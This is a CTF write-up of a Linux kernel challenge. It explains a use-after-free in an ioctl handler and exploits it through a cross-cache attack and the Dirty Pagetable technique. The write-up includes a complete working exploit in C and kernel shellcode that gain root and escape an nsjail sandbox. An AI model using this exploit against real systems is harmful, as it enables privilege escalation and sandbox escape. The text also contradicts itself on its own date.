Understanding Dirty Pagetable – m0leCon Finals 2023 CTF Writeup

About

I participated in m0leCon Finals 2023 CTF, held at Politecnico di Torino, Italy, as a member of std::weak_ptr<moon>*1.

Among the pwnable challenges I solved during the CTF, a kernel pwn named kEASY was quite interesting, so I'm going to explain the exploitation technique I used to solve it.

Challenge setup

Mitigations

KASLR, SMAP, SMEP, and KPTI are enabled.

#!/bin/sh
qemu-system-x86_64 \
    -kernel bzImage \
    -cpu qemu64,+smep,+smap,+rdrand \
    -m 4G \
    -smp 4 \
    -initrd rootfs.cpio.gz \
    -hda flag.txt \
    -append "console=ttyS0 quiet loglevel=3 oops=panic panic_on_warn=1 panic=-1 pti=on page_alloc.shuffle=1" \
    -monitor /dev/null \
    -nographic \
    -no-reboot

Mitigations such as slab freelist randomization and slab hardening are also enabled. Additionally, the given shell is sandboxed by nsjail, which prohibits many system calls and imposes resource limits such as the number of processes.

Source code

A kernel module that defines an ioctl handler is loaded on the system. The handler is the function below:

static long keasy_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
    long ret = -EINVAL;
    struct file *myfile;
    int fd;

    if (!enabled) {
        goto out;
    }
    enabled = 0;

    myfile = anon_inode_getfile("[easy]", &keasy_file_fops, NULL, 0);

    fd = get_unused_fd_flags(O_CLOEXEC);
    if (fd < 0) {
        ret = fd;
        goto err;
    }

    fd_install(fd, myfile);

    if (copy_to_user((unsigned int __user *)arg, &fd, sizeof(fd))) {
        ret = -EINVAL;
        goto err;
    }

    ret = 0;
    return ret;

err:
    fput(myfile);
out:
    return ret;
}

It creates an anonymous file named [easy] and assigns a file descriptor to it. Once the descriptor is assigned, its number is copied to a user-land buffer.

This feature can be called only once*2 after boot.

Vulnerability

If copy_to_user fails after fd_install has assigned the file descriptor, execution goes to err and fput is called. fput decrements the reference count of a file. The counter becomes zero in this case because the anonymous file is not shared, so the structure allocated for the file is freed.

This means that a Use-after-Free occurs if copy_to_user fails, because the file itself is freed while its file descriptor is still alive in user-land.

Confirming the bug

We can easily make copy_to_user fail by passing an invalid address, which causes the Use-after-Free. Since the new file descriptor will be the smallest available number, we can predict it even though ioctl fails.

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>

void fatal(const char *msg) {
    perror(msg);
    exit(1);
}

int main() {
    // Open vulnerable device
    int fd = open("/dev/keasy", O_RDWR);
    if (fd == -1)
        fatal("/dev/keasy");

    // Get dangling file descriptor
    int ezfd = fd + 1;
    if (ioctl(fd, 0, 0xdeadbeef) == 0)
        fatal("ioctl did not fail");

    // Use-after-free
    char buf[4];
    read(ezfd, buf, 4);

    return 0;
}

We can confirm that the kernel crashes when we execute the code above.

[Figure: UAF confirmed]

What makes the exploit hard is that the UAF occurs in a dedicated slab cache [1] rather than a generic one. A file structure is allocated from a dedicated slab cache (named filp in mainline kernels; files_cache, listed below, is the similarly dedicated cache for files_struct):

# cat /proc/slabinfo | grep files_cache
files_cache          920    920    704   23    4 : tunables    0    0    0 : slabdata     40     40      0

Therefore, unlike objects allocated with kmalloc, objects other than files will not usually overlap the freed object after the Use-after-Free, which makes exploitation difficult.

Cross-Cache Attack

Still, we can use an exploitation technique called a cross-cache attack to exploit a heap vulnerability that occurs in a dedicated cache. Several attacks build on cross-cache, such as Dirty Cred [2] and Dirty Pagetable.

The principle of the cross-cache attack is simple. I'm going to explain it for the Use-after-Free case.

First of all, we spray objects allocated in the dedicated cache, as shown in ① and ② in the figure below.

[Figure: cross-cache attack, steps ① to ④]

Secondly, we free the UAF object as in ③*3.

Finally, if we free every sprayed object (④), the slab page is also freed, since no object in it is in use any longer.

The buddy system in Linux manages pages, and a freed page can be reused for a different purpose later on. Therefore, we can overlap the UAF file object with a structure completely different from a file.

In the Dirty Cred attack, the structure we overwrite is cred, which manages the privileges of a process. However, we need a different attack this time since the target is a file structure.

Dirty Pagetable

I used a technique named Dirty Pagetable to solve this challenge.

How it works

Just as Dirty Cred sets the cred structure as the attack target, Dirty Pagetable sets the page table as the attack target.

In x86-64 Linux, a 4-level page table is usually used to translate virtual addresses to physical addresses. Dirty Pagetable targets the PTE (Page Table Entry) level, the last level before physical memory. In Linux, when a new page of PTEs is required, that page is also allocated from the buddy system.

Therefore, we can allocate a page of PTEs on the same page that the dangling file pointer refers to. The following figure describes the situation*4.

[Figure: the UAF file object overlapping a page of PTEs]

The following code overlaps the UAF object with a PTE. Remember to pin the process to a single CPU so that the same per-CPU slab cache is used throughout, since the system runs on multiple cores this time.

void bind_core(int core) {
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

int main() {
    int file_spray[N_FILESPRAY];
    void *page_spray[N_PAGESPRAY];

    // Pin CPU (important!)
    bind_core(0);

    // Open vulnerable device
    int fd = open("/dev/keasy", O_RDWR);
    if (fd == -1)
        fatal("/dev/keasy");

    // Prepare pages (PTE not allocated at this moment)
    for (int i = 0; i < N_PAGESPRAY; i++) {
        page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
                             0x8000, PROT_READ|PROT_WRITE,
                             MAP_ANONYMOUS|MAP_SHARED, -1, 0);
        if (page_spray[i] == MAP_FAILED) fatal("mmap");
    }

    puts("[+] Spraying files...");
    // Spray file (1)
    for (int i = 0; i < N_FILESPRAY/2; i++)
        if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

    // Get dangling file descriptor (the next free number after the last spray)
    int ezfd = file_spray[N_FILESPRAY/2-1] + 1;
    if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
        fatal("ioctl did not fail");

    // Spray file (2)
    for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
        if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

    puts("[+] Releasing files...");
    // Release the page for file slab cache
    for (int i = 0; i < N_FILESPRAY; i++)
        close(file_spray[i]);

    puts("[+] Allocating PTEs...");
    // Allocate many PTEs (page fault)
    for (int i = 0; i < N_PAGESPRAY; i++)
        for (int j = 0; j < 8; j++)
            *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

    getchar();
    return 0;
}

The file structure right before it gets freed by fput:

[Figure: the file structure before it is freed]

After the PTE spray finishes, we find PTE-like data allocated at the same address:

[Figure: PTE-like data at the address of the freed file structure]

One of the entries points to the following physical memory, where we can find the data we wrote. This means the PTE was allocated for one of the sprayed pages.

[Figure: physical memory containing the sprayed data]

Ideally, we want to overwrite this PTE and make a user-land virtual address point to a kernel-land physical address. How we can overwrite the PTE depends on the vulnerable object. Let's consider the case of a file structure.

Exploitation of a file structure

A file structure is somewhat hard to exploit because it has few fields we can control. The original article [3] explains a method using dup, and we will use it as well.

A file structure has a field named f_count at offset 0x38 from the beginning.

struct file {
    union {
        struct llist_node f_llist;
        struct rcu_head f_rcuhead;
        unsigned int f_iocb_flags;
    };
    /*
     * Protects f_ep, f_flags.
     * Must not be taken from IRQ context.
     */
    spinlock_t f_lock;
    fmode_t f_mode;
    atomic_long_t f_count;
    struct mutex f_pos_lock;
    /* ... */
};

f_count is the reference count of the file object, and it is incremented when we call the dup system call to duplicate the file descriptor. Therefore, we obtain a primitive that increments an entry in the page of PTEs.

So, can we simply call dup many times to make a PTE point to a kernel-land physical address?

Unfortunately, it is not so simple.

Most physical addresses are randomized when KASLR is enabled. In addition, the physical memory allocated for user-land sits at much lower addresses than the physical memory for kernel-land, and the gap is large.

A process can have up to 65535 file descriptors in this environment, which limits the number of increments we can make. One solution is to fork and split the work across processes to bypass the limit, but that is not possible this time because nsjail allows us to run only 2 processes.

Therefore, we need another way to make a user-land virtual address point to a kernel-land physical address.

UAF in physical memory

So far, the UAF file object is located at the same physical address as a page of PTEs, as described in the figure below:

[Figure: the UAF file object and the page of PTEs at the same physical address]

Here, if we call dup 0x1000 times, the entry at the location corresponding to f_count is advanced by 0x1000 and now points to the next physical page, so two PTEs point to the same physical address.

[Figure: two PTEs pointing to the same physical page]

After this modification, we can find the overlapping page by reading each sprayed page and checking whether the data we wrote has changed.

/**
 * 4. Modify PTE entry to overlap 2 physical pages
 */
// Increment physical address
for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
        fatal("dup");

puts("[+] Searching for overlapping page...");
// Search for page that overlaps with other physical page
void *evil = NULL;
for (int i = 0; i < N_PAGESPRAY; i++) {
    // We wrote 'H' (= 'A' + 7); if it changed, this PTE overlaps with the file
    if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
        evil = page_spray[i] + 0x7000;
        printf("[+] Found overlapping page: %p\n", evil);
        break;
    }
}
if (evil == NULL) fatal("target not found :(");

We can detect the overlapping page as shown below:

[Figure: output showing the overlapping page found]

Checking the physical address of the detected page, we find that 2 user-land virtual addresses point to the same physical address.

[Figure: two virtual addresses mapped to the same physical address]

Note that the overlap itself is not what matters here. What matters is that we now know the user-land virtual address corresponding to the PTE we can corrupt.

Arbitrary Physical Address Read/Write

As mentioned earlier, we cannot reach kernel-land physical memory simply by calling dup many times, because of the distance between user-land and kernel-land physical memory. To resolve this problem, I used DMA-BUF Heap this time. (The original article also mentions io_uring, but it is not available because of nsjail.)

DMA-BUF [4] is a mechanism for sharing memory buffers quickly and safely between multiple devices. We can open the device at /dev/dma_heap/system to use DMA-BUF Heap. By issuing the DMA_HEAP_IOCTL_ALLOC ioctl on this device, we can allocate memory that can be mapped to user-land.

A page mapped through this ioctl is different from a page mapped by an ordinary mmap: it is allocated in physical memory close to the pages of PTEs*5.

So, if we place the PTE for a DMA-BUF Heap page at the entry we can corrupt with f_count, we can realize the following situation. (We have to allocate the DMA-BUF Heap page during the PTE spray so that another page of PTEs is allocated next to the DMA page.)

[Figure: the DMA-BUF Heap page adjacent to a page of PTEs]

Since we already know which user-land page corresponds to the PTE we can corrupt, we munmap it and mmap the DMA-BUF Heap page in its place, so that f_count overlaps the PTE for the DMA-BUF Heap page.

What is important is that a page of PTEs exists next to the page allocated with DMA-BUF Heap. Therefore, if we call dup 0x1000 times again to increment f_count, the DMA-BUF Heap mapping in user-land will point to a page of PTEs.

[Figure: the DMA-BUF mapping now pointing to a page of PTEs]

Since we can read and write the DMA-BUF page mapped to user-land, we obtain a primitive that fully controls a page of PTEs. So, we can modify its entries and make one of them point to an arbitrary physical address, including kernel-land.

[Figure: a controlled PTE pointing to kernel-land physical memory]

This is how we can achieve arbitrary physical address read/write.

If we run the following code, the page allocated with DMA-BUF will be adjacent to a PTE.

/**
 * 3. Overlap UAF file with PTE
 */
puts("[+] Allocating PTEs...");
// Allocate many PTEs (1)
for (int i = 0; i < N_PAGESPRAY/2; i++)
    for (int j = 0; j < 8; j++)
        *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

// Allocate DMA-BUF heap
int dma_buf_fd = -1;
struct dma_heap_allocation_data data;
data.len = 0x1000;
data.fd_flags = O_RDWR;
data.heap_flags = 0;
data.fd = 0;
if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
    fatal("DMA_HEAP_IOCTL_ALLOC");
printf("[+] dma_buf_fd: %d\n", dma_buf_fd = data.fd);

// Allocate many PTEs (2)
for (int i = N_PAGESPRAY/2; i < N_PAGESPRAY; i++)
    for (int j = 0; j < 8; j++)
        *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

/**
 * 4. Modify PTE entry to overlap 2 physical pages
 */
// Increment physical address
for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
        fatal("dup");

puts("[+] Searching for overlapping page...");
// Search for page that overlaps with other physical page
void *evil = NULL;
for (int i = 0; i < N_PAGESPRAY; i++) {
    // We wrote 'H' (= 'A' + 7); if it changed, this PTE overlaps with the file
    if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
        evil = page_spray[i] + 0x7000;
        printf("[+] Found overlapping page: %p\n", evil);
        break;
    }
}
if (evil == NULL) fatal("target not found :(");

// Place PTE entry for DMA buffer onto controllable PTE
puts("[+] Remapping...");
munmap(evil, 0x1000);
void *dmabuf = mmap(evil, 0x1000, PROT_READ | PROT_WRITE,
                    MAP_SHARED | MAP_POPULATE, dma_buf_fd, 0);
*(char*)dmabuf = '0';

Checking in gdb, we can see that a page of PTEs is allocated at the address where the dangling file object was, and that the physical address of the DMA-BUF page is located at the offset corresponding to f_count. Additionally, the page next to the DMA-BUF page looks like another page of PTEs.

[Figure: gdb view of the PTE for the DMA-BUF page at the f_count offset]

Therefore, we can call dup 0x1000 times to corrupt a PTE.

/**
 * Get physical AAR/AAW
 */
// Corrupt physical address of DMA-BUF
for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
        fatal("dup");
printf("[+] DMA-BUF now points to PTE: 0x%016lx\n", *(size_t*)dmabuf);

Leaking physical base address

Reads and writes through the physical address succeed regardless of page permissions. So, we can search for specific machine code or magic numbers to locate the physical address of the kernel.

Although it's already 2024, we can still find some fixed physical addresses on both Linux and Windows.

[Figure: memory contents at a fixed physical address]

The pages around here are always at fixed addresses, and page table data is left in them. (Credit to shift_crops, who found it during HITCON.) The page table there holds a pointer to a kernel-land physical address, which is useful for leaking the physical base address of the kernel.

// Leak kernel physical base
void *wwwbuf = NULL;
*(size_t*)dmabuf = 0x800000000009c067;
for (int i = 0; i < N_PAGESPRAY; i++) {
    if (page_spray[i] == evil) continue;
    if (*(size_t*)page_spray[i] > 0xffff) {
        wwwbuf = page_spray[i];
        printf("[+] Found victim page table: %p\n", wwwbuf);
        break;
    }
}
size_t phys_base = ((*(size_t*)wwwbuf) & ~0xfff) - 0x1c04000;
printf("[+] Physical kernel base address: 0x%016lx\n", phys_base);

Escaping from nsjail

This time we need to escape from nsjail in addition to escalating privileges. Since doing so is complicated, let's execute shellcode in kernel space.

Because we have an AAW primitive on physical memory, we can simply overwrite the machine code of some function in the Linux kernel with our shellcode. I overwrote do_symlinkat, which can be reached from inside nsjail by calling the symlink function in C.

Refer to [5] for what the shellcode is doing.

  init_cred         equ 0x1445ed8
  commit_creds      equ 0x00ae620
  find_task_by_vpid equ 0x00a3750
  init_nsproxy      equ 0x1445ce0
  switch_task_namespaces equ 0x00ac140
  init_fs                equ 0x1538248
  copy_fs_struct         equ 0x027f890
  kpti_bypass            equ 0x0c00f41

_start:
  endbr64
  call a
a:
  pop r15
  sub r15, 0x24d4c9

  ; commit_creds(init_cred) [3]
  lea rdi, [r15 + init_cred]
  lea rax, [r15 + commit_creds]
  call rax

  ; task = find_task_by_vpid(1) [4]
  mov edi, 1
  lea rax, [r15 + find_task_by_vpid]
  call rax

  ; switch_task_namespaces(task, init_nsproxy) [5]
  mov rdi, rax
  lea rsi, [r15 + init_nsproxy]
  lea rax, [r15 + switch_task_namespaces]
  call rax

  ; new_fs = copy_fs_struct(init_fs) [6]
  lea rdi, [r15 + init_fs]
  lea rax, [r15 + copy_fs_struct]
  call rax
  mov rbx, rax

  ; current = find_task_by_vpid(getpid())
  mov rdi, 0x1111111111111111   ; will be fixed at runtime
  lea rax, [r15 + find_task_by_vpid]
  call rax

  ; current->fs = new_fs [8]
  mov [rax + 0x740], rbx

  ; kpti trampoline [9]
  xor eax, eax
  mov [rsp+0x00], rax
  mov [rsp+0x08], rax
  mov rax, 0x2222222222222222   ; win
  mov [rsp+0x10], rax
  mov rax, 0x3333333333333333   ; cs
  mov [rsp+0x18], rax
  mov rax, 0x4444444444444444   ; rflags
  mov [rsp+0x20], rax
  mov rax, 0x5555555555555555   ; stack
  mov [rsp+0x28], rax
  mov rax, 0x6666666666666666   ; ss
  mov [rsp+0x30], rax
  lea rax, [r15 + kpti_bypass]
  jmp rax

  int3

Here is the final exploit:

#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

#define N_PAGESPRAY 0x200
#define N_FILESPRAY 0x100

#define DMA_HEAP_IOCTL_ALLOC 0xc0184800

typedef unsigned long long u64;
typedef unsigned int u32;
struct dma_heap_allocation_data {
    u64 len;
    u32 fd;
    u32 fd_flags;
    u64 heap_flags;
};

void fatal(const char *msg) {
    perror(msg);
    exit(1);
}

void bind_core(int core) {
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

unsigned long user_cs, user_ss, user_rsp, user_rflags;
static void save_state() {
    asm(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "movq %%rsp, %2\n"
        "pushfq\n"
        "popq %3\n"
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_rsp), "=r"(user_rflags)
        :
        : "memory");
}

int fd, dmafd, ezfd = -1;

static void win() {
    char buf[0x100];
    int fd = open("/dev/sda", O_RDONLY);
    if (fd < 0) {
        puts("[-] Lose...");
    } else {
        puts("[+] Win!");
        read(fd, buf, 0x100);
        write(1, buf, 0x100);
        puts("[+] Done");
    }
    exit(0);
}

int main() {
    int file_spray[N_FILESPRAY];
    void *page_spray[N_PAGESPRAY];

    /**
     * 1. Setup
     */
    // Pin CPU (important!)
    bind_core(0);
    save_state();

    // Open vulnerable device
    int fd = open("/dev/keasy", O_RDWR);
    if (fd == -1)
        fatal("/dev/keasy");

    // Open DMA-BUF
    int dmafd = creat("/dev/dma_heap/system", O_RDWR);
    if (dmafd == -1)
        fatal("/dev/dma_heap/system");

    // Prepare pages (PTE not allocated at this moment)
    for (int i = 0; i < N_PAGESPRAY; i++) {
        page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
                             0x8000, PROT_READ|PROT_WRITE,
                             MAP_ANONYMOUS|MAP_SHARED, -1, 0);
        if (page_spray[i] == MAP_FAILED) fatal("mmap");
    }

    /**
     * 2. Release the page where dangling file points
     */
    puts("[+] Spraying files...");
    // Spray file (1)
    for (int i = 0; i < N_FILESPRAY/2; i++)
        if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

    // Get dangling file descriptor (the next free number after the last spray)
    int ezfd = file_spray[N_FILESPRAY/2-1] + 1;
    if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
        fatal("ioctl did not fail");

    // Spray file (2)
    for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
        if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

    puts("[+] Releasing files...");
    // Release the page for file slab cache
    for (int i = 0; i < N_FILESPRAY; i++)
        close(file_spray[i]);

    /**
     * 3. Overlap UAF file with PTE
     */
    puts("[+] Allocating PTEs...");
    // Allocate many PTEs (1)
    for (int i = 0; i < N_PAGESPRAY/2; i++)
        for (int j = 0; j < 8; j++)
            *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

    // Allocate DMA-BUF heap
    int dma_buf_fd = -1;
    struct dma_heap_allocation_data data;
    data.len = 0x1000;
    data.fd_flags = O_RDWR;
    data.heap_flags = 0;
    data.fd = 0;
    if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
        fatal("DMA_HEAP_IOCTL_ALLOC");
    printf("[+] dma_buf_fd: %d\n", dma_buf_fd = data.fd);

    // Allocate many PTEs (2)
    for (int i = N_PAGESPRAY/2; i < N_PAGESPRAY; i++)
        for (int j = 0; j < 8; j++)
            *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

    /**
     * 4. Modify PTE entry to overlap 2 physical pages
     */
    // Increment physical address
    for (int i = 0; i < 0x1000; i++)
        if (dup(ezfd) < 0)
            fatal("dup");

    puts("[+] Searching for overlapping page...");
    // Search for page that overlaps with other physical page
    void *evil = NULL;
    for (int i = 0; i < N_PAGESPRAY; i++) {
        // We wrote 'H' (= 'A' + 7); if it changed, this PTE overlaps with the file
        if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
            evil = page_spray[i] + 0x7000;
            printf("[+] Found overlapping page: %p\n", evil);
            break;
        }
    }
    if (evil == NULL) fatal("target not found :(");

    // Place PTE entry for DMA buffer onto controllable PTE
    puts("[+] Remapping...");
    munmap(evil, 0x1000);
    void *dmabuf = mmap(evil, 0x1000, PROT_READ | PROT_WRITE,
                        MAP_SHARED | MAP_POPULATE, dma_buf_fd, 0);
    *(char*)dmabuf = '0';

    /**
     * Get physical AAR/AAW
     */
    // Corrupt physical address of DMA-BUF
    for (int i = 0; i < 0x1000; i++)
        if (dup(ezfd) < 0)
            fatal("dup");
    printf("[+] DMA-BUF now points to PTE: 0x%016lx\n", *(size_t*)dmabuf);

    // Leak kernel physical base
    void *wwwbuf = NULL;
    *(size_t*)dmabuf = 0x800000000009c067;
    for (int i = 0; i < N_PAGESPRAY; i++) {
        if (page_spray[i] == evil) continue;
        if (*(size_t*)page_spray[i] > 0xffff) {
            wwwbuf = page_spray[i];
            printf("[+] Found victim page table: %p\n", wwwbuf);
            break;
        }
    }
    size_t phys_base = ((*(size_t*)wwwbuf) & ~0xfff) - 0x1c04000;
    printf("[+] Physical kernel base address: 0x%016lx\n", phys_base);

    /**
     * Overwrite do_symlinkat
     */
    puts("[+] Overwriting do_symlinkat...");
    size_t phys_func = phys_base + 0x24d4c0;
    *(size_t*)dmabuf = (phys_func & ~0xfff) | 0x8000000000000067;
char shellcode[] = {0xf3, 0x0f, 0x1e, 0xfa, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x49, 0x81, 0xef, 0xc9, 0xd4, 0x24, 0x00, 0x49, 0x8d, 0xbf, 0xd8, 0x5e, 0x44, 0x01, 0x49, 0x8d, 0x87, 0x20, 0xe6, 0x0a, 0x00, 0xff, 0xd0, 0xbf, 0x01, 0x00, 0x00, 0x00, 0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc7, 0x49, 0x8d, 0xb7, 0xe0, 0x5c, 0x44, 0x01, 0x49, 0x8d, 0x87, 0x40, 0xc1, 0x0a, 0x00, 0xff, 0xd0, 0x49, 0x8d, 0xbf, 0x48, 0x82, 0x53, 0x01, 0x49, 0x8d, 0x87, 0x90, 0xf8, 0x27, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc3, 0x48, 0xbf, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x98, 0x40, 0x07, 0x00, 0x00, 0x31, 0xc0, 0x48, 0x89, 0x04, 0x24, 0x48, 0x89, 0x44, 0x24, 0x08, 0x48, 0xb8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0xb8, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x48, 0x89, 0x44, 0x24, 0x18, 0x48, 0xb8, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0xb8, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0xb8, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x48, 0x89, 0x44, 0x24, 0x30, 0x49, 0x8d, 0x87, 0x41, 0x0f, 0xc0, 0x00, 0xff, 0xe0, 0xcc};
    // Patch the placeholder constants in the shellcode with runtime values
    void *p;
    p = memmem(shellcode, sizeof(shellcode), "\x11\x11\x11\x11\x11\x11\x11\x11", 8);
    *(size_t*)p = getpid();
    p = memmem(shellcode, sizeof(shellcode), "\x22\x22\x22\x22\x22\x22\x22\x22", 8);
    *(size_t*)p = (size_t)&win;
    p = memmem(shellcode, sizeof(shellcode), "\x33\x33\x33\x33\x33\x33\x33\x33", 8);
    *(size_t*)p = user_cs;
    p = memmem(shellcode, sizeof(shellcode), "\x44\x44\x44\x44\x44\x44\x44\x44", 8);
    *(size_t*)p = user_rflags;
    p = memmem(shellcode, sizeof(shellcode), "\x55\x55\x55\x55\x55\x55\x55\x55", 8);
    *(size_t*)p = user_rsp;
    p = memmem(shellcode, sizeof(shellcode), "\x66\x66\x66\x66\x66\x66\x66\x66", 8);
    *(size_t*)p = user_ss;

    memcpy(wwwbuf + (phys_func & 0xfff), shellcode, sizeof(shellcode));
    puts("[+] GO!GO!");

    printf("%d\n", symlink("/jail/x", "/jail"));

    puts("[-] Failed...");
    close(fd);

    getchar();
    return 0;
}

Yay!

References

[1] Linux Slab Allocator (about the slab allocator)

[2] 手を動かして理解するLinux Kernel Exploit (about Dirty Cred)

[3] Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel (the original article explaining Dirty Pagetable)

[4] DMA-BUF Heaps (about DMA-BUF Heap)

[5] CoRJail: From Null Byte Overflow To Docker Escape Exploiting poll_list Objects In The Linux Kernel (how to bypass nsjail)

*1: The team name consists of st98, weak ptr-yudai, and keymoon.

*2: We can actually call it multiple times due to the lack of a mutex, but it's not necessary.

*3: Allocation and release take place in the same function in this case, but it doesn't matter since we will free all objects in ④ eventually.

*4: The file structure is actually much larger in size.

*5: Refer to [3] for more details.

 

Originally published on Hatena Blog: Understanding Dirty Pagetable – m0leCon Finals 2023 CTF Writeup

Reposted by admin on December 12, 2023 at 8:36 PM.
